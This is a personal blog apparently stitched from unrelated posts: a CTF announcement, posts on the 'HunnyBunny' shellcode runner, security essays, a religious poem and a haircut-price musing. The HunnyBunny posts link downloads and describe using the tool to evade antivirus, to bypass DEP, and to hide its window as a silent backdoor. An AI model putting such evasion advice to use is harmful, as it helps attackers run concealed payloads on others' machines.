IHack 2013 13-14 April. Ready t0 0wned?

It's 2013 and Mayan Prediction failed again.  But we know in a competition  winner = awessome, losing= sucks.


Once again, we are proud to be selected as the community who will be the the Uitm IHACK 2013 . Two categories.

1. Attack and Defense Style ( Headache mode)

2. Forensic ( Jeopardy mode).


If you are a IPT students without much cash . Here is a good chance to grab some bucks and fame. The min average  of inflation  in this country is 5%. So better get used to the money.

Hints and Tips:?

1. The usual Network Keys.
2. Enter the VM worlds,  (we got plenty of it)
3. If you know function as  a special subroutine with local variables and return value. Yeah u might got the kick.
4. Think outside the box

Hiding the Wolf inside a sheep.

If u follow my post previously, if you run hunnybunny  even when using shortcut it will create something like this.

A command prompt... We don`t actually like command prompt since it defeat the purpose of silent backdoor.

In Linux we can easily background a process simply by issuing command & . But in Windows nah no such thing.

How can we background a backdoor process  in this case?
Simple, by treating our console application as  a windows application!!!
So we include  the nesccary windows header file to build a gui apps
Declare the procedure and set
/** mark the windows invisible **/
  ShowWindow (hwnd, 0);

Smack our original code in main function  and we are good to go.

Download: http://www.sendspace.com/file/by8b01

HunnyBunny: Execute any shellcode on the

The philosophy of a gun.

A gun is dangerous if there is a bullet inside it.
A bullet is dangerous if it were shot from a gun.

Thus if we managed to separate both gun and bullet , both would appear to be harmless althought their nature is a bit violence.

HunnyBunny follow the philosophy of a gun. It acts as a platform that can be used to execute raw shellcode in a file. You can use hunnybunny to

- Evade Antivirus (Most of em )
- Test shellcode functionality (Does it work properly or not)
- Execute alpha/numeric based shellcode with ease 
- Works around well with DEP/NX bit set on .

Download  binary and instruction slides :)

http://www.sendspace.com/file/kijzpf

Videos Tutorial:

It's similliar to http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html

Purifying Security

The   IT industries in Malaysia generally have been influx with lots of impurity. While it's generally acceptable to be vendor bias, product bias, framework bias etcx3 (otherwise the whole industry would black out if we do not choose a side  [open versus close][open cooperated with close][align with gov or not ]. But we information need to be secured.

The idea of IT is derive from two root words in English which is 

1. Information

2. Technology

It should be noted generally, in no where the words computer pops up in the definition of IT from the word IT itself. However regarding information technology is widely define as a medium or spectrum on how knowledge,records, should be stored.

From historical point of view , we know that information are being passed around for generations to generations via oral recitation. This is a known fact in the history of mankind. It took them millennial years to come out with writing symbols and standards.

Why does this happen ? Since we know when transmitting information via orally, information integrity may be altered, human have the tendencies to forget.In order to preserve the knowledge,transmission the knowledge is preserved in textual/writing forms. While the writings/textual exist it doesn't really altered the fact that oral knowledge is also a form of information transmission. . 

And mankind have enter a new millennial where the age to preserve knowledge can be done digitally. However mankind have late to realize that when data is transform in a bits and bytes manner we found out that every element in the digital world can be compromised and corrupted badly. 

In the old world, a signature or a sealed is used to indicate the originality/integrity of a data. While some may argue that it's full of flaws , the digital world does t help much at all. Abusing so called "trusted" digital certificates happen everywhere. And worst case , some digital forensics doesn`t help much in getting to the truth about and incident. A pathology can estimate the age of a dinosaur bone but a digital forensic investigator may  not know at what time an intrusion occurred if the logs are altered. 

Thus we are living in a dangerous age, in the age where information is thrown upon us without limit, There's not a single effective methods on separating useful/junk information in the Internet. (There's none actually). Truth/Lies/Deception/Scandalous news are being thrown in our faces (literally since u r reading it via dis blogspot/facebook). This creates a lot of partisan in the history of mankind. And worst of all the one who is actually winning is the Cooperation not the community behind it. This is important in a sense that a cooperation wouldn`t  be bother with moral obligation (moral != laws), Shaming,humiliating an individual without actual proof or with prove does not really matter to em. What's more important is that they keep you entertain until you drop dead. But that's not the path of death that we are seeking right?

So the ideal of Network Security from my point of view is not to actually getting rid of viruses in your thumb-drive but to preserve information in a way that is protected in CIA sense.

C = Confidentiality,

I  = Integrity,

A = Availability.

Unfortunately  many people doesn`t get the idea . Security is for em buying a bunch of tools and setup some sort of deception sensory without realizing the fact that what's to be protected the most is left unprotected...

And thus the tribulation age of security descent unto us. 

Fitna of the World

The World ,

The fitnah have unsheathed itself on this Ummah,
Oh how difficult it is to be seen good in the eyes of people nowadays,
When a kid died from hijacking his sister car,
We blame the police, we blame the authority
Yet nobody said anything about the family,
Why let a mere child wonder around in the middle of the night outside?
Our great fuqaha in their youth  woke up in the middle of the night to perform prayers,
Be it from their own self interest or from the scold of their mothers,
Yet our youth today spends the night dancing , eating and smoking and feels like living forever,
If only they knew how short and ugly the reality of this world

Owh the one with family
What is the welfare of your family?
We talk about injustice but did we do justice to our family?
Our Master sayiidul Muhammad s.a.w told us
The best of you are those who are best to their families
and I am the best of you to my family

Singers were idolized
Lyrics were memorized
But only Hafizun have the priviledge to pull us from hellfire.

Praise Allah the Lord of the Lord ,
Kings of all Kings
The Only One Almighty,
Yet people are trying to ask His follower can we use
his Holy Name in our religion book?
Masha-Allah,
How can the ummah accept it thinking hey it's allright,
When the Non-Followers putting Allah and his 99 Glorious Name in an unaccepted place?

When the skies almost cracks
And the Earth almost shatters
When someone mentioning our Lord have a son ....
But the human remain ignored.


It's true Allah Azzawajalla Name have no trademark and copyright,
He didn`t need patent , nor lawyer not anything else.
Since everything is HIS and we re here because of HIS MERCY
Kunfayakun
And things ceast to exist
Kunfayakun
And logic breaks down..

Budget Gunting Rambut

Budget,bonus,gula,handphone,bantuan,miskin,billion,trillion,gazilion,pendidikan percuma blax3, minyak subsidi blax3, etcx3

What do u get when u compare BN budget and PR Budget?
Answer: It's the same regardless which road u choose. Just  +-


From the PPP of our GDP based on IndexMundi
http://www.indexmundi.com/malaysia/gdp_(purchasing_power_parity).html

The hidden law in economy is that, everything is computable if u eliminate unnecessary human feelings toward any party . When you can compute which means there's a law that can be follow.

We've seen the rise of purchasing power parity grows steady approximation 5% increase per year. There's a bit slop on 99-2000 due to dat depression period but else we see a rate of growth every year.  Now some people say it's thanks to BN, DR.M and blax3 our PPP increased .
But from law of exponentiation in economics

And for the doubling time where rate of growth  goes 100% from the initial sampling

And we can see it's true in 14 years  the rate of growth goes beyond 100%

What does this statistic tell us?  We spend a lot on doing regular things . Forget unhealthy stuff like (radical energy from electronic devices and high calories food)  take Gunting rambut for example.

An average Joe (decent malaysian bukan rambut kalerx2 or rambut panjang macam Kage) spend an average 15 minutes  at a barber shop. A normal hair grow 1/2 inch per month so for boys , it means 2 month cut hair you continue to cut hair like u did in school, At 30. you should experience at least 138 hair cuts.(Starting from age of 7). Nerveless the price of cutting hair increase exponentially with the doubling time.

Current gunting rambut price average in KL is 10..

Time spending at barber shop: 15 minutes constant .

Do take not unless some dystopia event is triggered. By the time anak Aalim umur 7 tahun . The price for to cut his son hair is roughly rm15 ringgit. and masuk from 2 straight rm30. bwahahha

Sources: indexmundi and some youtube video. Don't care bout crappy grammars aku bukan mat salleh 

There is no security.

The Scenario

Alice : Hi I would like to make booking reservation at your resort today.

Manager: Sure but u need to send us a copy of front/back of your cc card to telly it.

Alice: Now way!! dat's Insecure.

Manager: Well you could use our online booking system. it's encrypted with 2048-bit blax333...

Alice: Cool, thanks man!!

Manager: No Problem , be sure not to do give the details in a public wifi and only use trusted "Network when u use our system, Can't have people snoop on the traffic eyt. "..

Taking a classical approach on crypto.. When Alice and Manager want to exchange sensiive information...

what do they do? Use SSL or any other "state of the art " of cryptic stuff into a Z transform.. So to simplify a flow of processs. We say Alice view the data in an unencrypted form same as Manager .  From process flow point of view.

So in the Genesis of Covert Channel , In the beginning there is no security, and in the end there is no security.  Suppose let us expend the diagram catering outside process flow.

Where Reality Domain is consisting physical interaction+ environment that Alice/ Manager  encounter with either living beings or non living beings . Why Logical Domain is the list of interaction that the application used/encounter  to view the insecure form of the data..

Suppose Alice is an owner of Credit/Debit Card,, In some way or another the Reality Domain that Alice may encounter is either

- Cashier

- Receptionist 

- Friends

- Family

While in Logical Domain can be narrowed down into 3  entity;

- Web Browser

- Email

- PDF Output or Postcript Dump for Printing/Archive purposes)

For Manager,  the Reality Domain they will encountered.

- Finance

- Clerk

- Auditor

- External booking Information

While in Logical Domain can be narrowed down into 3  entity;

- Software viewing customer data, (Probably Excel or PDF Form)

- Email

- PDF Output or Postcript Dump for Printing/Archive purposes)

Notice that any interaction in the reality domain and logical domain doesn`t have any form of security at all.

What's the implication of this information? Suppose a Manager says "we received this booking from this Alice, here's her detail please process and proceed with the payment"  to Finance. The instruction and information will be passed around in an insecure domain form (regardless via electronics means such as email or verbal )..

We spend tremendous amount of money to secure the process flow with multitude complience that we often forgot to realize what happen in the "event before the flow" and "event after the flow" ..

• Have we pay attention on security in interaction in both domains?
• What's keeping our data safe from any entity for each domains?
• Can an entity hop/mimicking other entity across domains?

In the lore of malware we know that a malware can hijack/process/threads of other application on certain circumstances(token privilege,RemoteThreadCreate() APi etcx3).

In the lore of scam-ware, we know a person can impersonate other people and retrive data as long as we have the correct personality.

In the lore of human brains, 99% of us cannnot cannot decrypt  DES with a "constant key" in mere seconds thus resulting that data need to be pass to another human in it's original forms (numbers,name,passwords).

Conclusion:

The reality of security is broken if it can be view in an insecure forms..

We are living in an insecured enviroment over a thin line of trust.